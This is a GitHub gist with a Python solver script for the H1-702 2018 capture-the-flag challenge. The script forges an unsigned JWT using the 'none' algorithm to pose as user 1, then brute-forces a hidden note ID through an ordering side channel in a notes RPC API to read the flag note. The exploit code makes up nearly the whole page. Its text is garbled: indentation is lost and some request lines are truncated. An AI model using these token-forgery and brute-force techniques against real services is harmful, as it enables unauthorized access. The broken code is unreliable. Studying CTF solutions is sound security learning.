Skip to content

Instantly share code, notes, and snippets.

Created June 23, 2018 15:31
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
What would you like to do?
H1-702-CTF Solver.
#!/usr/bin/env python
#-*- coding: utf-8 -*-
# Copyright 2018 @simps0n
import jwt,requests,json,time,sys
url = ""
#Create JWT Token with ID 1
#jwt = jwt.encode({'id': '1'}, '', algorithm='none')
jwt = "eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJpZCI6IjEifQ.t4M7We66pxjMgRNGg1RvOmWT6rLtA8ZwJeNP-S8pVak"
#Epoch from the note with the FLAG!
refValue = "1528911533"
alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
def bfFlag():
start = time.time()
bfID = ''
temp = ''
toKeep = False
killswitch = True
while killswitch:
for char in list(alphabet):
sys.stdout.write(">> Checking Value: "+bfID+char+" ("+str(len(bfID))+")"+"\r")
#Avoid time issues
#Check the current ID postion After/Before and keep the last "before" char temporarily
if evaluate():
temp = char
toKeep = True
#ID position is after the reference Epoch so the last test char (temp) is to keep
elif toKeep:
#Validate the if the over char is the one!
killswitch = getNote(bfID+char)
if not killswitch:
#Update bfID with last known "before" char and check note
bfID += temp
killswitch = getNote(bfID)
toKeep = False
end = time.time()
timetaken = end - start
print ">> Found it in: "+str(timetaken)
def evaluate():
epochs = getNotesMetadata()
if epochs.index(refValue) == 0:
#New note is after..
return False
#New note is before!
return True
def getNotesMetadata():
headers = {'Authorization': jwt,'Accept':'application/notes.api.v1+json'}
rsp = requests.get(url+'/rpc.php?method=getNotesMetadata', headers=headers)
data = json.loads(rsp.content)
return data['epochs']
def resetNotes():
headers = {'Authorization': jwt,'Accept':'application/notes.api.v1+json'}
rsp ='/rpc.php?method=resetNotes',headers=headers)
data = json.loads(rsp.content)
#print data
def createNote(testID):
headers = {'Authorization': jwt,'Accept':'application/notes.api.v2+json'}
postBody = {'note':'NotTheNoteYouAreLookingFor...','id':testID}
rsp ='/rpc.php?method=createNote',json=postBody,headers=headers)
data = json.loads(rsp.content)
#print data
def getNote(noteID):
headers = {'Authorization': jwt,'Accept':'application/notes.api.v1+json'}
rsp = requests.get(url+'/rpc.php?method=getNote&id='+noteID, headers=headers)
data = json.loads(rsp.content)
if not data.get('epoch') == None:
if data['epoch'] == refValue:
print " API Data: " + str(data)
print ">> Note ID: " + noteID
print ">> Note: " + data['note']
return False
#print "Flag not Found - Try Harder!"
return True
def main(args):
return 0
if __name__ == '__main__':
import sys
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment